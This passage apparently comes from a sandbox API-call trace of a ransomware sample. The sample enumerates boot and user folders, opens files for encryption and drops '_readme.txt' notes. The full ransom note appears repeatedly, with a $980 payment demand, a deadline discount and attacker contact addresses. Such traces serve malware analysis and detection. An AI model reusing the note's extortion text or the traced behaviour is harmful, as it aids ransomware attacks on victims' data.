decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.080] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0166.080] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0166.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.080] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.080] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.080] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0166.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.080] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0166.080] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0166.081] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.081] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.081] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.081] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.082] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.082] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.082] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.082] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.082] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.082] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.082] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.082] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.082] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.082] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0166.082] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.082] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.082] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.082] PathFindFileNameW (pszPath="") returned="" [0166.082] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.082] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.082] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.083] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.083] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0166.083] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0166.083] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.083] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.083] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0166.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.083] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.083] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.084] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.084] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0166.084] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.084] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0166.084] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.084] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.084] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.084] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.084] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.084] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.084] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0166.084] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0166.084] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.084] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.084] PathFindFileNameW (pszPath="") returned="" [0166.084] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.085] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.085] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.085] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.085] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.085] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.085] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44fa8 | out: hHeap=0xcd0000) returned 1 [0166.085] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0166.085] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0166.085] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.085] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.085] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44fa8 | out: hHeap=0xcd0000) returned 1 [0166.085] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.085] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, 